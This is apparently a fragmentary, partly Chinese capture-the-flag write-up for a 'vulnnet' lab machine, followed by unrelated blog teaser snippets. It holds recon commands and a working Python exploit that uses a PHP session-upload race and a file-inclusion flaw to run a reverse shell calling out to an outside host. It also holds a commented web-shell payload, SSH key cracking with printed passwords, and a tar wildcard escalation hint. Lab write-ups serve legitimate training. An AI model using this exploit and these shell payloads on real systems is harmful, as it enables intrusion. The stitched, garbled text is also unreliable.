You will have to add a machine IP with domain vulnnet.thm to your /etc/hosts
rustscan -a 10.10.86.144 -r 1-65535
nmap -A -p22,80 10.10.86.144
python3 dirsearch.py -u http://10.10.86.144/
broadcast.vulnnet.thm
/etc/hosts
指向同一个 IPbroadcast.vulnnet.thm
referer
参数
import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = 'http://vulnnet.thm/index.php'
param = "referer"
#code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');"
code = '''system("bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'");'''
while True:
req = [grequests.post(base_url,
files={'f': "A"*0xffff},
data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"},
cookies={'PHPSESSID': sess_name}),
grequests.get(f"{base_url}?{param}={sess_path}")]
result = grequests.map(req)
if "pwned" in result[1].text:
print(result[1].text)
break
id_rsa
server-management
id_rsa
需要密码 QQpython3 ../../ssh2john.py id_rsa > id_rsa_john
oneTWO3gOyac
.htpasswd
密码的 hash
broadcast.vulnnet.thm
用的9972761drmfsls
developers
9972761drmfsls
tar *
iframe 是 写网页常见的语法之一 在进公司前不知道有这语法 但通常一个网页内容 左侧或上方选单...
中碳 1723 由於今天中碳因为和鸿海签署材料开发合作备忘录,开盘後便直奔涨停板, 刚好我们来趁着这...
铁人30天心得 前言 k8s真的好硬rrrrr,写了30天,感觉才不到k8s 1%的内容,加上k8s...
在撰写文章的时候,最常使用「标题区块 Heading Block」和「段落区块 Paragraph...
今天是最後一天了,每天看这本书《听说做完380个实例,就能成为.NET Core大内高手》,真的里面...